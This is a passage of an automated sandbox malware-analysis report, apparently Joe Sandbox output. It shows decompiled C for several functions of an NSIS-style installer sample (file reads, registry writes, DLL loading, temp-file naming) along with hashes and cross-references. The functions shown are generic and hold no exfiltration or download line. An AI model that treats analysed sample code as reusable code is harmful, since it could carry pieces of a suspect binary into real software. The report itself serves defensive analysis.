C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nstC2CA.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp$C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll$Call
API String ID: 1941528284-2600654064
Opcode ID: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x170250
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll
API String ID: 1495540970-2706585709
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

%s%S.dll, xrefs: 004068E6
UXTHEME, xrefs: 004068A3
\, xrefs: 004068C2

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstC2CA.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nstC2CA.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstC2CA.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nstC2CA.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp
API String ID: 2655323295-2738806344
Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406061
nsa, xrefs: 00406069

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
